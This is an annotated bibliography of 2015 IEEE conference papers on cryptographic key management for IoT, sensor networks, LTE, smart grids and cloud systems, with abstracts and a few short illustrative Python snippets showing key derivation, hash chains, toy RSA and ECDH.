Abstract: It is anticipated that constrained devices in the Internet of Things (IoT) will often operate in groups to achieve collective monitoring or management tasks. For sensitive and mission-critical sensing tasks, securing multicast applications is therefore highly desirable. To secure group communications, several group key management protocols have been introduced. However, the majority of the proposed solutions are not adapted to the IoT and its strong processing, storage, and energy constraints. In this context, we introduce a novel decentralized and batch-based group key management protocol to secure multicast communications. Our protocol is simple and it reduces the rekeying overhead triggered by membership changes in dynamic and mobile groups and guarantees both backward and forward secrecy. To assess our protocol, we conduct a detailed analysis with respect to its communication and storage costs. This analysis is validated through simulation to highlight energy gains. The obtained results show that our protocol outperforms its peers with respect to the rekeying overhead and the mobility of members.

Keywords: Internet of Things; cryptographic protocols; data privacy; mobile computing; multicast communication; backward secrecy; communication costs; decentralized batch-based group key management protocol; dynamic groups; energy constraints; energy gains; forward secrecy; group communication security; membership changes; mobile Internet of Things; mobile groups; multicast applications; rekeying overhead reduction; sensitive mission-critical sensing tasks; storage costs; Context; Encryption; Mobile communication; Peer-to-peer computing; Protocols; Servers; Data confidentiality; Group key Management; Internet Of Things; Multicast communications; Security and Privacy (ID#: 16-9359)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7363210&isnumber=7362962

 

Vijayalakshmi, V.; Sharmila, R.; Shalini, R., "Hierarchical Key Management Scheme using Hyper Elliptic Curve Cryptography in Wireless Sensor Networks," in Signal Processing, Communication and Networking (ICSCN), 2015 3rd International Conference on, pp. 1-5, 26-28 March 2015. doi: 10.1109/ICSCN.2015.7219840

Abstract: A wireless sensor network (WSN) is a large-scale network with thousands of tiny sensors, and it is of utmost importance as it is used in real-time applications. Currently, WSNs are required for up-to-the-minute applications including the Internet of Things (IoT), smart cards, smart grids, smart phones and smart cities. However, the greatest issue in sensor networks is secure communication, for which key management is the primary objective. Existing key management techniques have many limitations, such as the need for prior deployment knowledge, limited transmission range, insecure communication, and node capture by an adversary. The proposed novel Track-Sector Clustering (TSC) and Hyper Elliptic Curve Cryptography (HECC) provide better transmission range and secure communication. In TSC, the overall network is separated into circular tracks and triangular sectors. A Power Aware Routing Protocol (PARP) is used for routing data in TSC, which reduces delay with an increased packet delivery ratio. Further, for secure routing, HECC is implemented with an 80-bit key size, which reduces memory space and computational overhead compared with the existing Elliptic Curve Cryptography (ECC) key management scheme.

Keywords: pattern clustering; public key cryptography; routing protocols; telecommunication power management; telecommunication security; wireless sensor networks; ECC; IOT; Internet of Things; PARP; TSC; WSN; computational overhead reduction; data routing; hierarchical key management scheme; hyper elliptic curve cryptography; memory space reduction; packet delivery ratio; power aware routing protocol; secure communication; smart card; smart city; smart grid; smart phone; track-sector clustering; up-to-the-minute application; wireless sensor network; Convergence; Delays; Elliptic curve cryptography; Real-time systems; Throughput; Wireless sensor networks; Hyper Elliptic Curve Cryptography; Key Management Scheme; Power Aware Routing; Track-Sector Clustering; Wireless Sensor network (ID#: 16-9360)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7219840&isnumber=7219823

 

Purushothama, B.R.; Koti, N., "Security Analysis of Tree and Non-Tree Based Group Key Management Schemes Under Strong Active Outsider Attack Model," in Advances in Computing, Communications and Informatics (ICACCI), 2015 International Conference on, pp. 1825-1829, 10-13 Aug. 2015. doi: 10.1109/ICACCI.2015.7275882

Abstract: Key management schemes for secure group communication should satisfy two basic security requirements: backward secrecy and forward secrecy. Most of the prominent secure group key management schemes have been shown to satisfy these basic security requirements under a passive attack model. In this paper, we analyze secure group key management schemes under an active outsider attack model, in which an adversary can compromise a legitimate user of the group. We show that some of the efficient tree based, non-tree based and proxy re-encryption based group key management schemes are not secure under the active attack model. We evaluate the cost involved in making these schemes secure under the active attack model. Also, we construct secure versions of these schemes and show that they are secure under the active outsider attack model.

Keywords: cryptography; trees (mathematics); backward secrecy; forward secrecy; nontree based group key management scheme security analysis; passive attack model; proxy reencryption scheme; secure group communication; strong active outsider attack model; tree based group key management scheme security analysis; Analytical models; Computational modeling; Cryptography; Polynomials; Servers; Vegetation (ID#: 16-9361)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7275882&isnumber=7275573

 

Shi Li; Inshil Doh; Kijoon Chae, "Key Management Mechanism in ALTO/SDN Based CDNi Architecture," in Information Networking (ICOIN), 2015 International Conference on, pp. 110-115, 12-14 Jan. 2015. doi: 10.1109/ICOIN.2015.7057866

Abstract: Content delivery network interconnection (CDNi) is a new interactive network that inherits all of the advantages of a single CDN. Moreover, CDNs supported by different network operators can communicate with each other directly through the interfaces between them. Meanwhile, this interactivity also brings some security issues. In this paper, we propose a new CDNi communication architecture combined with two other efficient technologies, ALTO and SDN. Based on this architecture, a key generation and distribution mechanism is also proposed to ensure the secure communication of content in CDNi. The analysis results show that it is scarcely possible for attackers to break our security system.

Keywords: computer network security; optimisation; software defined networking; telecommunication traffic; ALTO-SDN based CDNi communication architecture; application-layer traffic optimization; content communication security; content delivery network interconnection; interactive network; key distribution mechanism; key management mechanism; software defined networking; Computer architecture; Equations; Routing; Security; Servers; Symmetric matrices; Vectors; ALTO service; CDNi; Key management; SDN; Security (ID#: 16-9362)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7057866&isnumber=7057846

 

Caixia Zhang; Lili Qu; Xiangdong Wang; Jianbin Xiong, "An Efficient Self-Healing Group Key Management with Lower Storage for Wireless Sensor Network," in Computer Science and Mechanical Automation (CSMA), 2015 International Conference on, pp. 124-128, 23-25 Oct. 2015. doi: 10.1109/CSMA.2015.31

Abstract: To address the problems of energy constraints and channel insecurity in WSN group communication, we propose a self-healing group key management protocol based on polynomials. This protocol can recover lost group keys without the message being transmitted again. The method improves the security of the channel while consuming less energy. The performance analysis of this protocol shows that it achieves forward secrecy, backward secrecy and communication security with lower energy consumption, which can expand the range of applications of wireless sensor networks while improving network lifetime.

Keywords: public key cryptography; wireless sensor networks; WSN; backward secrecy; channel insecurity; channel security; communication security; forward secrecy; group communication; self-healing group key management protocol; wireless sensor networks; Automation; Cryptography; Energy consumption; Protocols; Wireless sensor networks; Yttrium; lower storage; security; self-healing; wireless sensor network (ID#: 16-9363)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7371635&isnumber=7371543

 

Chen Hong, "Towards a Identity-Based Key Management System for Vehicular Ad Hoc Network," in Measuring Technology and Mechatronics Automation (ICMTMA), 2015 Seventh International Conference on, pp. 1359-1362, 13-14 June 2015. doi: 10.1109/ICMTMA.2015.332

Abstract: Current solutions either do not consider the main requisites of these networks, such as the absence of central administration or self-organization, or do not detail important operations, such as key revocation or key update. Thus, this paper presents a complete and fully self-organized identity-based key management scheme for mobile ad hoc networks, built on Identity-Based Cryptography. The scheme does not depend on any central authority or trusted third party, even during network formation. It also provides mechanisms to revoke the private keys of malicious or compromised nodes and ways to update the keys of non-compromised nodes. Simulation results show that the scheme is effective while not imposing a high communication overhead on the system.

Keywords: mobility management (mobile radio); telecommunication security; vehicular ad hoc networks; central authority; malicious node; mobile ad hoc network; noncompromised node; private key; self-organized identity-based key management scheme; third trusted party; vehicular ad hoc network; Identity-based encryption; Mobile ad hoc networks; Simulation; Wireless communication; Identity-Based Cryptography; Security; vehicular ad hoc network (ID#: 16-9364)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7263828&isnumber=7263490

 

Treytl, A.; Sauter, T., "Hierarchical Key Management for Smart Grids," in Systems Engineering (ISSE), 2015 IEEE International Symposium on, pp. 496-500, 28-30 Sept. 2015. doi: 10.1109/SysEng.2015.7302803

Abstract: Data transfer in smart grids is sensitive and must be properly protected. However, proven security approaches from the IT world can be used only to a certain extent. In particular, resource limitations in the communication network for the last mile and the field devices must be taken into account, which makes popular asymmetric public key infrastructures difficult to apply. This paper reviews current security architectures and proposes an efficient solution based on symmetric keys, which has advantages for highly resource limited devices and networks. Key management follows a four-level hierarchical approach, where the actual session keys used for regular data exchange in the smart grid can be derived automatically by the field devices to increase system security and save communication bandwidth. Execution time measurements of the cryptographic algorithms demonstrate the efficiency of the approach.

Keywords: power system security; public key cryptography; smart power grids; time measurement; asymmetric public key infrastructures; communication bandwidth; communication network; cryptographic algorithms; data transfer; execution time measurements; four-level hierarchical approach; hierarchical key management; regular data exchange; security architectures; session keys; smart grids; symmetric keys; Bandwidth; Computer architecture; Encryption; Program processors; Smart grids; communication network; key management; security; smart grid (ID#: 16-9365)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7302803&isnumber=7302498
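
Automatic derivation of session keys from a symmetric key hierarchy is typically built on a keyed one-way function such as HMAC; a generic four-level chain might look as follows. The level names and labels here are illustrative assumptions, not the paper's exact construction.

    import hmac, hashlib

    def derive(parent: bytes, label: bytes) -> bytes:
        # one-way child-key derivation: child = HMAC-SHA256(parent, label)
        return hmac.new(parent, label, hashlib.sha256).digest()

    master  = bytes(32)                                 # level 1: placeholder master key
    region  = derive(master, b"region/7")               # level 2
    device  = derive(region, b"meter/00:1a:2b")         # level 3
    session = derive(device, b"session/2015-09-28T10")  # level 4: per-exchange key
    # a field device holding its level-3 key recomputes `session` locally,
    # so no session-key transport is needed on the constrained last mile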

 

Fakhrey, H.; Boussakta, S.; Tiwari, R.; Al-Mathehaji, Y.; Bystrov, A., "Location-Dependent Key Management Protocol for a WSN with a Random Selected Cell Reporter," in Communications (ICC), 2015 IEEE International Conference on, pp. 6300-6305, 8-12 June 2015. doi: 10.1109/ICC.2015.7249328

Abstract: A wireless sensor network (WSN) employed to serve smart city applications is usually located in a vast and vulnerable territory. In order to secure vital and critical information, the security requirements of data confidentiality, authenticity and availability should be guaranteed. One of the leading key management schemes is based on using location information to generate security credentials. However, existing location-dependent schemes have disadvantages related to cell capture caused by a threshold number of nodes (e) being compromised. This paper presents a location-dependent key management protocol with a random selected cell reporter, LKMP-RSCR, where a set of cell reporters are selected randomly by the base station (BS) to provide a third level of report endorsement. In the LKMP-RSCR, an adversary would need to compromise all cell reporters in addition to endorsement (e) nodes to capture a particular cell. The LKMP-RSCR is presented and evaluated using an extensive analysis that shows a significant enhancement achieved in comparison with LEDS and MKMP schemes in terms of data confidentiality (85%), authenticity (35%) and availability (85%).

Keywords: cryptographic protocols; wireless sensor networks; LKMP-RSCR; WSN; authenticity; availability; data confidentiality; location-dependent key management protocol; random selected cell reporter; security requirements; smart city applications; wireless sensor network; Ad hoc networks; Authentication; Cryptography; Light emitting diodes; Probability; Wireless sensor networks; End-to-End Security; Location- Dependent Key Management System; Smart Cities; Wireless Sensor Network (WSN) (ID#: 16-9366)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7249328&isnumber=7248285

 

Kumar Reddy K, P.; Chandavarkar, B.R., "Mitigation of Desynchronization Attack During Inter-eNodeB Handover Key Management in LTE," in Contemporary Computing (IC3), 2015 Eighth International Conference on, pp. 561-566, 20-22 Aug. 2015. doi: 10.1109/IC3.2015.7346744

Abstract: In recent years, the 3rd Generation Partnership Project (3GPP) has taken on a pivotal role in standardizing the 4G network. Long Term Evolution (LTE) is a standard by 3GPP, and its main goal is the transition of mobile cellular wireless technology to 4G. Optimization of radio access techniques, along with improvements in LTE systems, led 3GPP to develop the 4G standard as the next generation of LTE-Advanced (LTE-A) wireless networks. The support of full inter-working and flat Internet Protocol (IP) connectivity with heterogeneous wireless access networks in both the 3GPP LTE and LTE-A architectures leads to new challenges in security. The primary challenge of LTE is to provide security to end users. Despite the security architecture available in LTE, vulnerabilities still exist that can compromise the whole network. The major contribution of this paper is the design of a new mitigation scheme that reduces the impact of the desynchronization attack during inter-eNodeB handover key management in LTE. A desynchronization attack can lead to serious consequences, such as the compromise of the User Equipment (UE) and eNodeB during inter-eNodeB handover key management.

Keywords: 3G mobile communication; 4G mobile communication; Long Term Evolution; cryptography; mobility management (mobile radio);telecommunication security; 3GPP; 4G network; LTE-Advanced; Third Generation Partnership Project; desynchronization attack mitigation; flat internet protocol; intereNodeB handover key management; interworking protocol; long term evolution; Base stations; Computer architecture; Handover; Long Term Evolution; Mathematical model; Security; 3GPP; AKA; LTE-Security; desynchronization attack; eNodeB; handover key management (ID#: 16-9367)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7346744&isnumber=7346637
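
The handover keys at issue form a one-way derivation chain: the key for the target eNodeB is derived from current key material bound to target-cell identifiers, so one compromised base station should not learn keys used elsewhere; a desynchronization attack works by tampering with the freshness inputs to this chain. A heavily simplified sketch of such forward derivation follows (the real 3GPP key derivation function and its inputs are more elaborate):

    import hmac, hashlib

    def kdf(key: bytes, *fields: bytes) -> bytes:
        return hmac.new(key, b"|".join(fields), hashlib.sha256).digest()

    k_enb = bytes.fromhex("11" * 32)   # key shared with the serving eNodeB
    # derive the target cell's key from the current one plus target identifiers;
    # forcing stale freshness values here is what desynchronizes the chain
    k_enb_star = kdf(k_enb, b"target-cell-id", b"target-dl-frequency")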

 

Zongmin Cui; Haitao Lv; Chao Yin; Guangyong Gao; Caixue Zhou, "Efficient Key Management for IOT Owner in the Cloud," in Big Data and Cloud Computing (BDCloud), 2015 IEEE Fifth International Conference on,  pp. 56-61, 26-28 Aug. 2015. doi: 10.1109/BDCloud.2015.40

Abstract: IoT (Internet of Things) owners may not want their sensitive data to be public in the cloud. However, the client operated by an IoT owner may be too lightweight to provide the encryption/decryption service. To address this issue, we propose a novel solution to minimize the access control cost for the IoT owner. First, we present a security model for IoT with minimal cost at the IoT owner client, which performs no encryption; the encryption/decryption is transferred from the client to the cloud. Second, we propose an access control model to minimize the key management cost for the IoT owner. Third, we provide an authorization update method to minimize this cost dynamically. In our method, the sensitive data from the IoT owner is only available to authorized users. Each IoT owner needs to manage only a single password, with which the owner can always manage his/her sensitive data and authorizations, no matter how the authorization policy changes. Experimental results show that our approach significantly outperforms most existing methods in efficient key management for the IoT owner.

Keywords: Internet of Things; authorisation; cloud computing; cryptography; Internet of Things; IoT; access control cost; authorization update method; cloud computing; decryption service; encryption service; key management cost; password management; security model; Authorization; Cloud computing; Encryption; Servers; Authorization update; Cloud computing; IOT owner key management; Internet of things; Sensitive data (ID#: 16-9368)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7310716&isnumber=7310694

 

Nengcheng Chen; Wenying Du, "Spatial-Temporal Based Integrated Management for Smart City: Framework, Key Techniques and Implementation," in Geoinformatics, 2015 23rd International Conference on, pp. 1-4, 19-21 June 2015. doi: 10.1109/GEOINFORMATICS.2015.7378628

Abstract: With the rapid development of the urban economy and the enormous increase in urban population, a series of problems arise, including the safety and security protection of citizens, emergency event response and management, the monitoring and maintenance of urban infrastructure, and the treatment of urban environmental pollution. These problems undoubtedly hinder the development of cities and the improvement of residents' quality of life, yet a novel and efficient management method for solving them has been absent. This paper proposes the method of spatial-temporal integrated management for smart cities (STIMSC), which is used to manage the diverse resources of cities, builds the overall architecture of integrated management, and forms an integrated management mode for cities by employing the techniques of collaborative sensing, the model web, and intelligent services. The pipe leakage event in Taiyuan, China on June 23, 2014 is chosen as the use case for the validation of STIMSC. Results demonstrate that STIMSC is able to integrate heterogeneous resources in a service-oriented way for decision makers, produce effective action plans for enterprises, and gain more evacuation time for residents. STIMSC is of great significance for improving the efficiency of city management.

Keywords: Internet; emergency management; quality management; security; smart cities; town and country planning; STIMSC; city management; collaborative sensing; emergency event management; emergency event responding; integrated management mode; intelligent service; model Web; pipe leakage event; quality improvement; safety protection; security protection; service-oriented way; smart city; spatial-temporal based integrated management; spatial-temporal integrated management for smart cities; urban economy; urban environment pollution treatment; urban infrastructures; urban population; Computational modeling; Metadata; Visualization; collaborative sensing; integrated management; intelligent service; model web; smart city (ID#: 16-9369)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7378628&isnumber=7378547

 

Chokngamwong, R.; Jirabutr, N., "Mobile Digital Right Management with Enhanced Security using Limited-Use Session Keys," in Electrical Engineering/Electronics, Computer, Telecommunications and Information Technology (ECTI-CON), 2015 12th International Conference on, pp. 1-5, 24-27 June 2015. doi: 10.1109/ECTICon.2015.7207069

Abstract: Digital content has been increasing rapidly and can contribute to business-to-customer productivity growth. A number of Mobile Digital Rights Management (MDRM) protocols have been proposed. The aim of MDRM is to distribute digital content to consumers in a controlled manner that protects its copyright. Some protocols do not provide the necessary security properties; hence, they may not be suitable for mobile networks. This paper introduces MDRM protocols for the distribution of digital content. The proposed protocols deploy a limited-use offline session key generation and distribution technique to enhance security and, importantly, to make them lightweight and more secure. Moreover, the proposed protocols are suitable for the current mobile infrastructure and thus maintain ease of use.

Keywords: content management; copy protection; copyright; cryptographic protocols; digital rights management; mobile computing; mobile radio; telecommunication security; MDRM protocol; business-to-customer productivity growth; consumers; digital content copyright protection; digital content distribution; limited-use offline session key generation; mobile digital right management; mobile infrastructure; mobile network; security enhancement; security property; Copyright protection; Encryption; Licenses; Mobile communication; Protocols; Data Protection; MDRM; Mobile Digital Right Management; Mobile Security; OMA DRM; ROAP (ID#: 16-9370)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7207069&isnumber=7206924
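
One common way to realize limited-use offline session keys is a one-way hash chain: both sides derive n keys by repeated hashing of a shared seed and then consume them in reverse order, so a disclosed key never reveals the unused ones. The sketch below shows that pattern as a plausible reading of 'limited-use session keys'; the paper's exact generation technique may differ.

    import hashlib

    def session_keys(seed: bytes, n: int):
        # build c_1 = H(seed), c_2 = H(c_1), ..., c_n, then release in reverse
        chain = [hashlib.sha256(seed).digest()]
        for _ in range(n - 1):
            chain.append(hashlib.sha256(chain[-1]).digest())
        return list(reversed(chain))   # keys[0] is the anchor, then k_1, k_2, ...

    keys = session_keys(b"shared seed", 5)
    anchor = keys[0]                   # registered with the verifier up front
    assert hashlib.sha256(keys[1]).digest() == anchor  # each key verifies the next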

 

Sone, M.E., "Efficient Key Management Scheme to Enhance Security-Throughput Trade-Off Performance in Wireless Networks," in Science and Information Conference (SAI), 2015, pp. 1249-1256, 28-30 July 2015. doi: 10.1109/SAI.2015.7237304

Abstract: Wireless network security schemes are characterized by parameters such as processing time and the avalanche property. These parameters tend to adversely affect the efficiency of the wireless network, namely the throughput of the network and lost/retransmitted packets. The undesirable effects of processing time and the avalanche property are due to the fact that existing implementations of wireless security schemes are based on symmetric cryptography. The avalanche property makes a block cipher secure but in turn reduces throughput, since it causes ciphers to be sensitive to bit errors. In addition, the processing time of the many rounds required to establish a session key significantly increases the round trip time (RTT) for a message. Hence there is a need to implement a wireless security scheme that minimizes both the processing time and the avalanche property. The paper introduces a new algorithm for wireless security based on RSA public-key cryptography, convolutional codes and subband coding. It describes an implementation using small integer key lengths, thereby minimizing processing time and the avalanche property, since it is based on asymmetric cryptography. Future work in this study can show that the implementation can fit in a single FPGA device close to a wireless transmitter and receiver at access points (APs).

Keywords: convolutional codes; error statistics; public key cryptography; radio networks; radio receivers; radio transmitters; telecommunication network management; telecommunication security; AP; RSA public-key cryptography; RTT; access points; asymmetric cryptography; avalanche property; bit errors; block cipher security; convolutional codes; efficient key management scheme; lost-retransmitted packets; round trip time; subband coding; symmetric cryptography; trade-off performance; wireless network security schemes; wireless receiver; wireless transmitter; Convolutional codes; Cryptography; Encoding; Filter banks; Forward error correction; Throughput; Cipher text; Field Programmable Gate Array (FPGA); Residue Number System (RNS); Rivest, Shamir and Adleman (RSA) cryptography; Trellis Coded Modulation (TCM); moduli set; residue number system (RNS) (ID#: 16-9371)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7237304&isnumber=7237120
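
The 'small integer key lengths' the paper exploits can be illustrated with textbook RSA arithmetic. These are toy parameters, trivially breakable; the point is only the shape of the computation.

    # textbook RSA with tiny parameters (demonstration only)
    p, q = 61, 53
    n, phi = p * q, (p - 1) * (q - 1)   # n = 3233, phi = 3120
    e = 17                              # public exponent, gcd(e, phi) = 1
    d = pow(e, -1, phi)                 # private exponent (Python 3.8+ modular inverse)

    m = 65                              # message encoded as an integer < n
    c = pow(m, e, n)                    # encrypt
    assert pow(c, d, n) == m            # decrypt recovers the message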

 

Salvi, S.; Sanjay, H.A.; Deepika, K.M.; Rangavittala, S.R., "An Encryption, Compression And Key(ECK) Management Based Data Security Framework For Infrastructure as a Service in Cloud," in Advance Computing Conference (IACC), 2015 IEEE International, pp. 872-876, 12-13 June 2015. doi: 10.1109/IADCC.2015.7154830

Abstract: Cloud computing is a recent technology that is based on a shared pool of resources and provides features like ubiquitous access, multi-tenancy, flexibility, scalability and pay-as-you-use, which make it resource efficient and cost effective. But cloud-based systems open unfamiliar threats in authentication and authorization. Explicit authorization must be defined at the smallest level, especially in multi-tenant environments. The relationship between the cloud service provider and the customer must also be clearly specified, including who holds administrative rights and indirect access to privileged customer information. Moreover, the use of the cloud in the educational and research community is still developing and has some security concerns. This paper provides a brief review of cloud security concerns for the adoption of cloud computing in data-sensitive research and technology-aided education. This paper also proposes an ECK-based framework for securing end-user data in a community cloud. Implications and considerations for additional research are provided as well.

Keywords: authorisation; cloud computing; cryptography; data compression; message authentication; ECK management; authentication; authorization; cloud computing security; cloud-based system; data security framework; encryption compression and key management; infrastructure as a service; Cloud computing; Computer architecture; Encryption; Virtual machining; Cloud Computing; Data Securtiy; Educational Cloud(Edu-Cloud); Virtual Machine(VM); Xen Server (ID#: 16-9372)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7154830&isnumber=7154658
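
One fixed point of any encryption-plus-compression design is ordering: data must be compressed before encryption, because good ciphertext has essentially no redundancy left to compress. A minimal sketch of such a data path follows, with key handling omitted; this is a generic illustration, not the proposed ECK framework itself.

    import os, zlib
    from cryptography.hazmat.primitives.ciphers.aead import AESGCM

    def store(plaintext: bytes, key: bytes) -> bytes:
        # compress, then encrypt; the reverse order would make
        # compression useless because ciphertext has no redundancy
        nonce = os.urandom(12)
        return nonce + AESGCM(key).encrypt(nonce, zlib.compress(plaintext), None)

    def load(blob: bytes, key: bytes) -> bytes:
        return zlib.decompress(AESGCM(key).decrypt(blob[:12], blob[12:], None))

    key = AESGCM.generate_key(bit_length=256)
    assert load(store(b"tenant data " * 100, key), key).startswith(b"tenant")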

 

Senan, S.; Hashim, A.A.; Othman, R.; Messikh, A.; Zeki, A.M., "Dynamic Batch Rekeying Scheme using Multiple Logical Key Trees for Secure Multicast Communication," in Computing, Control, Networking, Electronics and Embedded Systems Engineering (ICCNEEE), 2015 International Conference on, pp. 47-51, 7-9 Sept. 2015. doi: 10.1109/ICCNEEE.2015.7381426

Abstract: Group key management has an important role in multicast security in order to achieve data integrity and confidentiality. The session key is a common secret key for a group of users in a key tree that is shared securely and efficiently among them. It is used to encrypt other session keys and transmitted data in order to protect group communication. This paper proposes a new key management protocol using multiple logical key trees for dynamic groups. To minimize the communication overhead of the rekeying process, one-way key derivation is integrated with the multiple logical key trees. New keys created by the server of the key tree are not sent to the members who are able to derive their own keys. As a result, each rekeying process requires fewer encrypted keys to be sent within the group tree. The performance analysis of the proposed scheme shows that it has lower communication cost than the other protocols compared.

Keywords: computer network security; cryptographic protocols; data integrity; multicast protocols; private key cryptography; trees (mathematics);communication overhead minimization; data confidentiality; data integrity; dynamic batch rekeying scheme; group communication protection; group key management; key management protocol; multicast communication security; multiple logical key tree; secret key; session key encryption; Multicast security; batch rekeying; group key management (ID#: 16-9373)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7381426&isnumber=7381351
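
The saving from one-way key derivation is that members already below a refreshed node compute the new key themselves, so the server only multicasts encrypted keys to subtrees that cannot derive them. In outline (a generic sketch of the idea, not the paper's exact protocol):

    import hashlib

    def refresh(old_key: bytes) -> bytes:
        # every member holding old_key derives the new version locally;
        # the server sends nothing to these members during rekeying
        return hashlib.sha256(b"rekey:" + old_key).digest()

    k_group_v1 = bytes(32)            # placeholder current group key
    k_group_v2 = refresh(k_group_v1)  # server and members agree with no messages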

 

Tawde, R.; Nivangune, A.; Sankhe, M., "Cyber Security in Smart Grid SCADA Automation Systems," in Innovations in Information, Embedded and Communication Systems (ICIIECS), 2015 International Conference on, pp. 1-5, 19-20 March 2015. doi: 10.1109/ICIIECS.2015.7192918

Abstract: Cyber attacks on modern SCADA (Supervisory Control and Data Acquisition) systems exploit vulnerabilities, as International Electrotechnical Commission (IEC) 61850 has no built-in security features. IEC 62351 is used to secure IEC 61850 profiles. SCADA power utilities using the IEC 61850 protocol face the problem of key management, as it is not outlined in IEC 62351. In recent times, key management in SCADA networks has been a major challenge. Due to the lack of resources and the low latency requirements of SCADA networks, it is infeasible to use traditional key management schemes such as RSA-based PKI (Public Key Infrastructure). This paper gives a general insight into the development of security mechanisms to secure substation-level SCADA communication with a Bump-in-the-wire (Bitw) device. Finally, we propose a security solution to eliminate the problem of key management by integrating CDAC's key distribution and management protocol Sec-KeyD into IEC 62351 to secure the IEC 61850 protocol.

Keywords: IEC standards; SCADA systems; protocols; public key cryptography; smart power grids; substation automation; Bitw device; CDAC key distribution protocol; CDAC key management protocol; IEC 61850 protocol; IEC 62351;International Electrotechnical Commission standard; RSA based PKI key management scheme; Sec-KeyD protocol; bump-in-the-wire device;cyber attack security; public key infrastructure; smart grid SCADA automation system; substation level SCADA communication security mechanism; supervisory control and data acquisition system; Authentication; Cryptography; IEC Standards; Protocols; Substations; Authentication; Bump-in-the wire; IEC 61850; IEC 62351; Key Management (ID#: 16-9374)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7192918&isnumber=7192777

 

Gopalakrishnan, S.; GaneshKumar, P., "Secure and Efficient Transmission in Wireless Network using Key Authentication Based Secured Multicasting Technique," in Advanced Computing and Communication Systems, 2015 International Conference on, pp. 1-4, 5-7 Jan. 2015. doi: 10.1109/ICACCS.2015.7324064

Abstract: Multicasting is a fast and simple way of transmitting the same data to multiple recipients at the same time, which saves transmission time. Since multicasting transmits to multiple recipients, it creates opportunities for various attacks. In the existing system, the Multicast Key Management Protocol (MKMP) is used, in which the session information about the users is given to the substations for the various groups. It is difficult to track the user list under the substations, and there are chances of missing or mismatching the user list against the station information. To overcome this problem, this paper introduces the KABSM (Key Authentication Based Secured Multicasting) approach, which provides a citizenship key for activating every function of the nodes in the network, such as entering a region and communicating. In this approach, a dynamic key is generated and assigned to all nodes in the network. The simulation results show that the proposed approach is more efficient than the existing approach.

Keywords: cryptographic protocols; multicast communication; radio networks; telecommunication security; KABSM; MKMP; dynamic key; key authentication based secured multicasting technique; multicast key management protocol; secure transmission; session information; station information; transmission time; user list; wireless network; Authentication; IEEE 802.11 Standard; Multicast communication; Protocols; Throughput; Wireless LAN; Wireless networks; Key Management; Multicast Key Management; Secured Multicasting; WLAN (ID#: 16-9375)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7324064&isnumber=7324014

 

Kavitha, R.J.; Caroline, B.E., "Hybrid Cryptographic Technique for Heterogeneous Wireless Sensor Networks," in Communications and Signal Processing (ICCSP), 2015 International Conference on, pp. 1016-1020, 2-4 April 2015. doi: 10.1109/ICCSP.2015.7322653

Abstract: Wireless sensor networks are often deployed in hostile and pervasive environments. They are prone to security threats, and they have a wide range of applications, such as military, environmental monitoring and health care. Traditional network security methods are not up to the mark due to limited resources. Several key management schemes have been proposed for security in heterogeneous sensor networks (HSNs). In this paper, we propose a key distribution scheme based on random key pre-distribution for heterogeneous sensor networks to achieve better security and performance compared to homogeneous networks, which suffer from high communication overhead, computation overhead and high storage requirements. A hybrid combination of symmetric and asymmetric keys is used: the cluster head and base station (BS) use public key encryption based on ECC, while symmetric key encryption is used between adjacent nodes in the cluster.

Keywords: public key cryptography; telecommunication computing; ubiquitous computing; wireless sensor networks; BS; asymmetric key encryption; cluster head; heterogeneous wireless sensor network security method; high communication overhead; high computation overhead; high storage requirements; hostile environment; hybrid cryptographic technique; key distribution scheme; key management scheme; pervasive environment; public key encryption; random key pre-distribution scheme; security threats; symmetric key encryption; Elliptic curve cryptography; Encryption; ISO Standards; Wireless sensor networks; Yttrium; Heterogeneous wireless sensor network; elliptic curve cryptography (ECC);key management; symmetric encryption (ID#: 16-9376)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7322653&isnumber=7322423
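
The hybrid pattern, expensive public-key agreement only on the cluster-head-to-base-station link and cheap symmetric keys inside the cluster, can be outlined with the `cryptography` package. This is a generic sketch; the curve choice and in-cluster key handling are assumptions, not the paper's parameters.

    from cryptography.hazmat.primitives.asymmetric import ec
    from cryptography.hazmat.primitives import hashes
    from cryptography.hazmat.primitives.kdf.hkdf import HKDF

    # cluster head <-> base station: ECC key agreement (expensive, done rarely)
    ch_priv = ec.generate_private_key(ec.SECP256R1())
    bs_priv = ec.generate_private_key(ec.SECP256R1())
    shared = ch_priv.exchange(ec.ECDH(), bs_priv.public_key())
    link_key = HKDF(algorithm=hashes.SHA256(), length=16,
                    salt=None, info=b"ch-bs link").derive(shared)
    # inside the cluster, adjacent nodes reuse cheap symmetric keys
    # (e.g., pre-distributed pairwise keys), avoiding public-key cost per hop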

 

Kiviharju, M., "Attribute Pooling for Cryptographic Access Control," in Military Communications and Information Systems (ICMCIS), 2015 International Conference on, pp. 1-12, 18-19 May 2015. doi: 10.1109/ICMCIS.2015.7158677

